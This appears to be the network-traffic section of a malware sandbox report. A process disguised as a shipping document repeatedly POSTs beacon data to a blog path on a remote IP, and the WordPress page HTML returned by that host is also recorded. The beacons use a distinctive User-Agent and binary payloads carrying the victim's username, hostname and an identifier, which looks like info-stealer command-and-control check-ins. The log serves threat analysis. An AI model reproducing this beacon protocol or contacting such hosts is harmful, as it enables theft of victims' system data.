Apr 25, 2024 09:42:05.728957891 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:05.729340076 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:05.730480909 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:05.730565071 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:05.730705023 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49755	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:05.989810944 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:06.115744114 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:06.904895067 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:06 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:06.904932022 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:06.905114889 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:06.913031101 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:06.913316011 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:06.913429022 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:06.913722038 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 25, 2024 09:42:06.913826942 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 25, 2024 09:42:06.913855076 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 25, 2024 09:42:06.914036989 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49756	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:07.189244032 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:07.319912910 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:08.240958929 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:07 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:08.241008043 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 25, 2024 09:42:08.241019964 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:08.241030931 CEST	5	IN	Data Raw: 55 54 46 2d 38 Data Ascii: UTF-8
Apr 25, 2024 09:42:08.241174936 CEST	6	IN	Data Raw: 22 20 2f 3e 0a 09 Data Ascii: " />
Apr 25, 2024 09:42:08.241184950 CEST	71	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: <meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:08.259830952 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:08.260708094 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:08.261924982 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:08.261969090 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49757	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:08.607821941 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:08.737339973 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:09.560532093 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:08 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:09.560549021 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:09.569822073 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:09.570661068 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:09.570754051 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:09.570915937 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:09.570976019 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:09.571028948 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:09.571090937 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia
Apr 25, 2024 09:42:09.571190119 CEST	1289	IN	Data Raw: 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 2d 61 6e 63 Data Ascii: -block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}.wp-block-social-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49758	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:09.977319002 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:10.108103991 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:10.924082994 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:10 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:10.924181938 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:10.924228907 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:10.932991028 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:10.933604956 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 25, 2024 09:42:10.933696985 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 25, 2024 09:42:10.933876038 CEST	1289	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0
Apr 25, 2024 09:42:10.933917046 CEST	1289	IN	Data Raw: 22 2c 22 5c 75 64 38 33 63 5c 75 64 66 66 34 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 37 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 32 5c 75 32 30 30 62 5c 75 64 62 34 30 5c 75 64 63 36 35 5c 75 32 30 30 62 5c 75 64 62 34 30 5c Data Ascii: ","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undef
Apr 25, 2024 09:42:10.934032917 CEST	1289	IN	Data Raw: 53 74 72 69 6e 67 28 29 5d 2e 6a 6f 69 6e 28 22 2c 22 29 2b 22 29 29 3b 22 2c 72 3d 6e 65 77 20 42 6c 6f 62 28 5b 65 5d 2c 7b 74 79 70 65 3a 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 7d 29 2c 61 3d 6e 65 77 20 57 6f 72 6b 65 72 28 55 52 Data Ascii: String()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(funct
Apr 25, 2024 09:42:10.934072971 CEST	1289	IN	Data Raw: 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 20 73 76 67 7b 68 65 69 67 68 74 3a 31 65 6d 3b 77 69 64 74 68 3a 31 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 20 2e 77 70 2d 73 6f 63 69 61 Data Ascii: al-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-socia

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49759	45.77.223.48	80	6536	C:\Users\user\Desktop\Awb# 1294440291; 2 ki_n; G.W 3.30 KG.exe

Timestamp	Bytes transferred	Direction	Data
Apr 25, 2024 09:42:11.222524881 CEST	239	OUT	POST /~blog/?ajax=ee HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: FE983A82 Content-Length: 149 Connection: close
Apr 25, 2024 09:42:11.351766109 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 25, 2024 09:42:12.151199102 CEST	215	IN	HTTP/1.1 200 OK Date: Thu, 25 Apr 2024 07:42:11 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 25, 2024 09:42:12.151349068 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 25, 2024 09:42:12.151469946 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 25, 2024 09:42:12.160645962 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 25, 2024 09:42:12.160938025 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
